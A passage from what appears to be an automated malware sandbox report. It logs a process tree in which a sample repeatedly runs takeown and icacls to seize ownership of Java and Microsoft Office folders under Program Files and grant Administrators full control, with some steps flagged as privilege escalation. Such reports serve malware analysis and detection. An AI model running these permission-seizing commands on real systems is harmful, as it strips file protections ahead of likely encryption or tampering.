  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java" /a
  2⤵
  PID:3556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8" /a
  2⤵
  PID:1040
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8" /grant Administrators:F
  2⤵
  PID:4824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\bin" /a
  2⤵
  PID:2676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\bin" /grant Administrators:F
  2⤵
  PID:4520
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe" /a
  2⤵
  PID:3956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe" /grant Administrators:F
  2⤵
  PID:3872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\include" /a
  2⤵
  PID:4692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\include" /grant Administrators:F
  2⤵
  PID:2872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\include\win32" /a
  2⤵
  PID:1708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\include\win32" /grant Administrators:F
  2⤵
  PID:3192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2720
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\include\win32\bridge" /a
  2⤵
  PID:4044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\include\win32\bridge" /grant Administrators:F
  2⤵
  PID:1544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre" /a
  2⤵
  PID:3840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre" /grant Administrators:F
  2⤵
  PID:1256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin" /a
  2⤵
  PID:4120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin" /grant Administrators:F
  2⤵
  PID:1492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe" /a
  2⤵
  PID:5108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe" /grant Administrators:F
  2⤵
  PID:3144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin" /a
  2⤵
  PID:2408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin" /grant Administrators:F
  2⤵
  PID:112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\plugin2" /a
  2⤵
  PID:512
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\plugin2" /grant Administrators:F
  2⤵
  PID:3784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\server" /a
  2⤵
  PID:3140
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\server" /grant Administrators:F
  2⤵
  PID:4192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\legal" /a
  2⤵
  PID:3412
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\legal" /grant Administrators:F
  2⤵
  PID:4120
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\legal\javafx" /a
  2⤵
  PID:3288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\legal\javafx" /grant Administrators:F
  2⤵
  PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\legal\jdk" /a
  2⤵
  PID:3048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\legal\jdk" /grant Administrators:F
  2⤵
  PID:2484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib" /a
  2⤵
  PID:3508
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib" /grant Administrators:F
  2⤵
  PID:1280
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\amd64" /a
  2⤵
  PID:4876
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\amd64" /grant Administrators:F
  2⤵
  PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\applet" /a
  2⤵
  PID:3872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\applet" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\cmm" /a
  2⤵
  PID:4120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\cmm" /grant Administrators:F
  2⤵
  PID:5048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\deploy" /a
  2⤵
  - Modifies file permissions
  PID:4676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\deploy" /grant Administrators:F
  2⤵
  PID:1544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\ext" /a
  2⤵
  PID:3840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\ext" /grant Administrators:F
  2⤵
  PID:4384
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\fonts" /a
  2⤵
  PID:428
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\fonts" /grant Administrators:F
  2⤵
  PID:3096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\images" /a
  2⤵
  PID:1492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\images" /grant Administrators:F
  2⤵
  PID:2396
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors" /a
  2⤵
  PID:1172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4368
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors" /grant Administrators:F
  2⤵
  PID:1732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\jfr" /a
  2⤵
  PID:3464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\jfr" /grant Administrators:F
  2⤵
  PID:3840
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\management" /a
  2⤵
  PID:3984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\management" /grant Administrators:F
  2⤵
  PID:4192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security" /a
  2⤵
  PID:4520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security" /grant Administrators:F
  2⤵
  PID:3956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy" /a
  2⤵
  PID:3912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy" /grant Administrators:F
  2⤵
  PID:724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited" /a
  2⤵
  PID:2248
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited" /grant Administrators:F
  2⤵
  PID:3872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited" /a
  2⤵
  PID:2484
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited" /grant Administrators:F
  2⤵
  PID:112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\legal" /a
  2⤵
  PID:1172
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\legal" /grant Administrators:F
  2⤵
  PID:2132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\legal\javafx" /a
  2⤵
  PID:4476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\legal\javafx" /grant Administrators:F
  2⤵
  PID:4888
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\legal\jdk" /a
  2⤵
  - Modifies file permissions
  PID:300
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\legal\jdk" /grant Administrators:F
  2⤵
  PID:1184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\lib" /a
  2⤵
  PID:116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\lib" /grant Administrators:F
  2⤵
  PID:3840
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8" /a
  2⤵
  PID:4192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8" /grant Administrators:F
  2⤵
  PID:4464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin" /a
  2⤵
  PID:5024
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\jabswitch.exe" /a
  2⤵
  PID:3784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\jabswitch.exe" /grant Administrators:F
  2⤵
  PID:2484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\dtplugin" /a
  2⤵
  PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\dtplugin" /grant Administrators:F
  2⤵
  PID:1732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\plugin2" /a
  2⤵
  PID:4944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\plugin2" /grant Administrators:F
  2⤵
  PID:116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\server" /a
  2⤵
  PID:3912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\server" /grant Administrators:F
  2⤵
  PID:5012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\legal" /a
  2⤵
  PID:3388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\legal" /grant Administrators:F
  2⤵
  PID:4888
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\legal\javafx" /a
  2⤵
  PID:4876
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3412
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\legal\javafx" /grant Administrators:F
  2⤵
  PID:3168
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\legal\jdk" /a
  2⤵
  PID:3020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\legal\jdk" /grant Administrators:F
  2⤵
  PID:2944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5000
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib" /grant Administrators:F
  2⤵
  PID:1708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\amd64" /a
  2⤵
  PID:2168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\amd64" /grant Administrators:F
  2⤵
  PID:4808
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\applet" /a
  2⤵
  PID:4384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\applet" /grant Administrators:F
  2⤵
  PID:4692
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\cmm" /a
  2⤵
  PID:956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\cmm" /grant Administrators:F
  2⤵
  PID:928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\deploy" /a
  2⤵
  PID:3972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\deploy" /grant Administrators:F
  2⤵
  PID:300
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\ext" /a
  2⤵
  PID:116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\ext" /grant Administrators:F
  2⤵
  PID:4256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\fonts" /a
  2⤵
  PID:3168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\fonts" /grant Administrators:F
  2⤵
  PID:4692
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\images" /a
  2⤵
  PID:2376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\images" /grant Administrators:F
  2⤵
  PID:3508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\images\cursors" /a
  2⤵
  PID:5048
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\images\cursors" /grant Administrators:F
  2⤵
  PID:4412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\jfr" /a
  2⤵
  PID:4888
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\jfr" /grant Administrators:F
  2⤵
  PID:4660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\management" /a
  2⤵
  PID:116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\management" /grant Administrators:F
  2⤵
  PID:1112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security" /a
  2⤵
  PID:3048
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3028
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security" /grant Administrators:F
  2⤵
  PID:2708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security\policy" /a
  2⤵
  PID:1256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security\policy" /grant Administrators:F
  2⤵
  PID:3840
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security\policy\limited" /a
  2⤵
  PID:5048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security\policy\limited" /grant Administrators:F
  2⤵
  PID:4384
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited" /a
  2⤵
  PID:4824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited" /grant Administrators:F
  2⤵
  PID:3296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office" /a
  2⤵
  PID:2708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office" /grant Administrators:F
  2⤵
  PID:3464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\Office16" /a
  2⤵
  PID:876
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\Office16" /grant Administrators:F
  2⤵
  PID:296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE" /a
  2⤵
  PID:3092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE" /grant Administrators:F
  2⤵
  PID:3700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\PackageManifests" /a
  2⤵
  PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\PackageManifests" /grant Administrators:F
  2⤵
  PID:4192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root" /a
  2⤵
  PID:4924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root" /grant Administrators:F
  2⤵
  PID:724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Client" /a
  2⤵
  PID:1492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Client" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe" /a
  2⤵
  PID:1464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe" /grant Administrators:F
  2⤵
  PID:956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16" /a
  2⤵
  PID:4640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16" /grant Administrators:F
  2⤵
  PID:2300
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors" /a
  2⤵
  PID:2548
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors" /grant Administrators:F
  2⤵
  PID:3168
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects" /a
  2⤵
  PID:3784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects" /grant Administrators:F
  2⤵
  PID:1112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts" /a
  2⤵
  PID:100
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts" /grant Administrators:F
  2⤵
  PID:4044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\fre" /a
  2⤵
  PID:4384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\fre" /grant Administrators:F
  2⤵
  PID:4368
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration" /a
  2⤵
  PID:3116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration" /grant Administrators:F
  2⤵
  PID:5000
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4476
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration\Integrator.exe" /a
  2⤵
  PID:2136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration\Integrator.exe" /grant Administrators:F
  2⤵
  PID:3860
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration\Addons" /a
  2⤵
  PID:1708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration\Addons" /grant Administrators:F
  2⤵
  PID:5108
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe" /a
  2⤵
  PID:4384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe" /grant Administrators:F
  2⤵
  PID:1464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Licenses" /a
  2⤵
  PID:4824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Licenses" /grant Administrators:F
  2⤵
  PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Licenses16" /a
  2⤵
  PID:1732
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Licenses16" /grant Administrators:F
  2⤵
  PID:2300
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\loc" /a
  2⤵
  PID:4280
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\loc" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4888
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office15" /a
  2⤵
  PID:2252
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office15" /grant Administrators:F
  2⤵
  PID:4044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16" /a
  2⤵
  PID:4924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16" /grant Administrators:F
  2⤵
  PID:3944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE" /a
  2⤵
  PID:724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE" /grant Administrators:F
  2⤵
  PID:928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\1033" /a
  2⤵
  PID:3464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\1033" /grant Administrators:F
  2⤵
  PID:3388
- C:\windows\system32\takeown.exe
